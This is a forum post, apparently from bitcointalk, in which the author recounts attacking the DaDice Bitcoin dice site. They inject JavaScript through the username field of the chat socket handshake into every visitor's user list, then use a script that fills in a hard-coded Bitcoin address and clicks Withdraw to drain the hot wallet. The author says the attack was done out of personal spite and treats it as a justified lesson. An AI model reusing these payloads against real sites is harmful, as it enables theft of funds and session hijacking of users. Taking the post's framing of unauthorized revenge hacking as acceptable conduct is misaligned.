The un-official report of how this attack was able to happenSorry, dadice_dev didn't explain how it happened. So I thought I would add an explanation so the public can make up for themselves if it was or wasn't serious. My oppinion is this is serious. But what do I know? This will be my last post on dadice.
After the first attack. Explained here:
https://bitcointalk.org/index.php?topic=973765.msg11351048#msg11351048A fix was sorted to prevent users being impersonated. However, the injection method stayed the same. In fact back then it was possible to do the same thing. However, the test here was to see if DaDice would lie about the severity and I didn't want to impact them too much. Think of it as a free bug report.
So back to what enabled all this drama.
The object:
var socket_handshake_gameplay_token
is the offending player. It tells the chat server who you are.
var socket_handshake_gameplay_token = {
"token": "1|11111111111111111111|1.1.1.1",
"user": {
"id": "1",
"username": "One",
"name": "",
"cm": "false"
},
"shared_secret": null
};It is sent to the chat server to update the chat server.
socket.emit("online", socket_handshake_gameplay_token);Thats fine, so how can we use this to update all clients with some JS code?
That required a lot of trial and error. Finding ways to do things is not always as simple as reading the code. One must first understand how these will render on the client browser. There was lots of time to be caught in the act. Maybe DaDice wanted to watch or just legitimately didn't think it was all that serious.
The userlist on the chat window is now where we need to look. The chat box does not allow scripts to run, but the userlist still updated with the new name change. Like this:
var socket_handshake_gameplay_token = {
"token": "1|11111111111111111111|1.1.1.1",
"user": {
"id": "1",
"username": "Two", //change name and user list updates
"name": "",
"cm": "false"
},
"shared_secret": null
}So now what.. We can make the server send our new username to all clients and all new clients.
Lets try running some JS. and keep the original HTML so it doesn't cause errors.
var socket_handshake_gameplay_token = {
"token": "1|11111111111111111111|1.1.1.1",
"user": {
"id": "1",
"username": 'One" class="" href="javascript:;"><script>//put script here</script>',
"name": "",
"cm": "false"
},
"shared_secret": null
}Now we can run any script we want. We could have called our own server and sent cookies and session data, or maybe implement subtle things like redirect the deposit code to our btc address. Since no one deposits on DaDice, that would be a tremendous waste of time.
A script to auto withdraw the dust was more fun.. But the hot wallet rarely has more than 0.1btc in it. This was not to take coin, but to show the dev he is arrogant. Had he not dismissed my first post I probably would have just reported it (I'm not interested in bug bounty money, I already have more than enough money). But he was a prick and I felt it would be better to just do another attack using JS. Maybe they can learn to be nice in the future. I was not paid nor did I do it to benefit any other dice site. This was done purely out of my personal spite to the people running DaDice because they were assholes to me.
My code here is pretty messy, setting up some events would have been better, but I was pretty lazy and the wallet only had 0.008btc left in it.
function clickButton(buttonName){$(".btn").each(function(i, obj) {
if ($(this).text()==buttonName){$(this).click();
$("#withdraw_payee").val("1Nu7zXeUEV1aBzVQCtY4unDiFJFxdRSN9b");
$("#withdraw_amount").val("0.001");}});
};
setInterval(function(){alert("DaDice has been Hacked.. bullshit message");clickButton("Withdraw");},5000);Then entire JS injection that was pasted into the console was this. This is not exactly as it was, because I was coding in the console and didn't save it. But you get the idea.
var socket_handshake_gameplay_token = {
"token": "1|11111111111111111111|1.1.1.1",
"user": {
"id": "1",
"username": 'One" class="" href="javascript:;"><script>function clickButton(buttonName){$(".btn").each(function(i, obj) {if ($(this).text()==buttonName){$("#withdraw_payee").val("1Nu7zXeUEV1aBzVQCtY4unDiFJFxdRSN9b");$("#withdraw_amount").val(+($("h2").text()-0.0001));$(this).click();}});};setInterval(if (+$("h2").text()>0.0011){function(){$("#account_withdraw").click();setTimeout(function(){clickButton("Withdraw");},5000);},10000);}</script>',
"name": "",
"cm": "false"
},
"shared_secret": null
};
socket.emit("online", socket_handshake_gameplay_token);
socket.emit("online_list_request", socket_handshake_gameplay_token);I will also be sending back the 0.008btc drained from the hot wallet to an account on DaDice, and I will even send a few extra dust particles as interest for the loan. This will also end the DaDice attacks. Someone else will probably find something new. Who knows. So be careful because DaDice have a history of taking a long time to fix known issues. If I wasn't so open, this would still be going on.
The point is, DaDice knew about this for weeks and nothing was done about it. They lied about the severity, or didn't realize the severity. If I ran a dice site, and had the same issue, I probably would try step around the severity too, can't blame them on that front. It was a simple chat attack. But this "simple" attack was a serious breach as we were able to run as much code as we wanted to. Anything could have been done on the client machines.
It also would have been prevented if they just allowed a skype call that I requested and was ignored.
I wished the Dev would have posted something more concrete like this. but instead he just tried to reduce it to a simple chat attack that did not impact their security. Yes it was indeed simple, but it was a major security breach.
Enjoy the day.
